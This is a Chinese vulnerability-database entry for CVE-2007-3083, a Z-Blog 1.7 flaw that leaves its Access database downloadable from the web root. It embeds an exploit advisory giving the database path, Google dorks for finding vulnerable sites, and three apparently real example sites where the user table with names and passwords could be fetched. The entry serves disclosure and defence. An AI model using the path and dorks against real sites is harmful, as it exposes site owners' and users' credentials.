Z-Blog 敏感信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190317 漏洞类型 未知
发布时间 2007-06-06 更新时间 2007-06-06
CVE编号 CVE-2007-3083 CNNVD-ID CNNVD-200706-092
漏洞平台 N/A CVSS评分 7.8
|漏洞来源
https://www.securityfocus.com/bid/86084
https://cxsecurity.com/issue/WLB-2007060038
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-092
|漏洞详情
Z-Blog1.7版本在web根下储存敏感信息而未赋予足够的访问控制,这使得远程攻击者可以借助一个对zblog.mdb的直接请求,下载数据库。
|漏洞EXP
 * Author  : Hasadya Raed
 * Contact : RaeD (at) BsdMail (dot) Com [email concealed] ~>Israel Hacker
 * Greetz  : Fairoz :)
 * Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability 
 * Script   : Z-Blog 1.7            
 * Impact   : Remote 
 * Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
 * Download   : http://bbs.rainbowsoft.org/attachment.php?aid=92

--/ REPRODUCE \--

# Attackers Can Authentication Bypass In This Product By Add The Following Files:
  ('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member]
  The Users Names And Passwords Inside

--/ Examples \--

http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb
|受影响的产品
Rainbowsoft Z-Blog 1.7
|参考资料

来源:XF
名称:zblog-zblog-information-disclosure(34673)
链接:http://xforce.iss.net/xforce/xfdb/34673
来源:BUGTRAQ
名称:20070601Z-Blog1.7AuthenticationBypassDatabaseDownloadVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/470238/100/0/threaded
来源:VUPEN
名称:ADV-2007-2060
链接:http://www.frsirt.com/english/advisories/2007/2060
来源:SREASON
名称:2776
链接:http://securityreason.com/securityalert/2776